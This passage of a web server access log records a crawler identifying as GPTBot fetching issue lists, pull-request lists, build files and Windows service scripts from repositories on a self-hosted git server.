(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" +[17/Feb/2026:19:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15230] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:19:33:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11210] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" +[17/Feb/2026:19:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20387] [Gzip 9.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" +[17/Feb/2026:19:33:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 11174] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" +[17/Feb/2026:19:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10040] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10037] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:33:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10151] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=all&type=all" +[17/Feb/2026:19:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:33:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10035] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10027] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10150] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10041] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&labels=0&project=-1&sort=farduedate&state=closed&type=all" +[17/Feb/2026:19:33:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=all&type=all" +[17/Feb/2026:19:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10204] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10001] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10160] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:33:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10033] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" +[17/Feb/2026:19:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 9992] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" +[17/Feb/2026:19:33:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&milestone=-1&sort=mostcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10245] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&sort=mostcomment&state=closed&type=all" +[17/Feb/2026:19:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:33:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:19:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10240] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=closed&type=all" [Client 74.7.227.38] [Length 10253] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9996] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:19:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10038] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10209] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:33:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10076] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:33:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=open&type=all" [Client 74.7.227.38] [Length 10249] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10080] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:33:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10251] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28none%29&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=recentupdate&state=open&type=all" [Client 74.7.227.38] [Length 10077] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastcomment&state=open&type=all" +[17/Feb/2026:19:33:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=nearduedate&state=open&type=all" [Client 74.7.227.38] [Length 10073] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10238] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10239] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:19:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=latest&state=closed&type=all" [Client 74.7.227.38] [Length 10064] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:19:33:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10229] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&state=closed&type=all" +[17/Feb/2026:19:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=closed&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" +[17/Feb/2026:19:33:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?sort=oldest&state=closed&type=all" +[17/Feb/2026:19:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10010] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:33:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/install_service.bat" +[17/Feb/2026:19:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat?display=rendered" [Client 74.7.227.38] [Length 11068] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/uninstall_service.bat" +[17/Feb/2026:19:33:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=rendered" [Client 74.7.227.38] [Length 11067] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:19:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec?display=source" [Client 74.7.227.38] [Length 13264] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog.spec" +[17/Feb/2026:19:33:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt?display=source" [Client 74.7.227.38] [Length 11273] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/requirements-windows.txt" +[17/Feb/2026:19:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md?display=rendered" [Client 74.7.227.38] [Length 13121] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/QUICKSTART_WINDOWS.md" +[17/Feb/2026:19:33:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/Patrol%20Window%20Service%20%EB%93%B1%EB%A1%9D/watchdog_service.py" +[17/Feb/2026:19:33:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr 